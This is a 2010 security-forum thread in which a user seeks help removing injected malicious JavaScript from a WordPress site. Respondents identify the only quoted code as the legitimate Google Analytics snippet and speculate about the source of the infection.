Government Security
Network Security Resources

Jump to content

Photo

Malware Detected On Website, Need To Remove

malware javascript php
  • Please log in to reply
3 replies to this topic

#1 shad0w7

shad0w7

    Private

  • Members
  • 7 posts

Posted 05 May 2010 - 10:11 AM

My friends website seems to have malware on it, however, I am unsure exactly how to remove it. They are using a javascript which reads from another infected site, and this in turn loads the malware. the function seems to be obfuscated in some way. Also, this javascript is present on any page which I view on the website. Sorry for vague details, but the function starts like this

<!-- Google analitics BEGIN -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

After which there is a large section which doesnt make any sense (includes part of an iframe along with some obfuscated stuff) - all this is practically at the bottom of the whole html source. The main thing is actually finding exactly where they've inserted the function, as its not just inserted simply on index.php.
The site is running Wordpress.
If someone very trusted is willing to help me out, I can discuss more in private.

#2 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 05 May 2010 - 11:39 AM

This is something that I picked from the source of this thread

<!-- Start Google Analytics --> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script> <script type="text/javascript"> try {var pageTracker = _gat._getTracker("UA-11496563-1");pageTracker._trackPageview();} catch(err) {}</script>

So you see, that's google's stuff. Legitimate!
Give more source, maybe then we can help.

#3 bonarez

bonarez

    Retired GSO Second Lieutenant

  • Sergeant Major
  • 1,252 posts

Posted 05 May 2010 - 01:58 PM

After which there is a large section which doesnt make any sense (includes part of an iframe along with some obfuscated stuff)

that's the stuff that matters, how is it obfuscated, what does it do?
"Ask the right question and you will receive the right answer. I'm just very sensitive about the right syntax"

Read the rules before you post

#4 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 06 May 2010 - 01:39 PM

I got your pm shad0w7, This is what it is...
Posted Image


This must be due to a vulnerable installation of WordPress, as in most cases.

This probably drives users to a site which will download some "antivirus" or try to exploit a vulnerability etc. But the domain name is interesting "crimepayz" not forgetting the "biz" ;)





Also tagged with one or more of these keywords: malware, javascript, php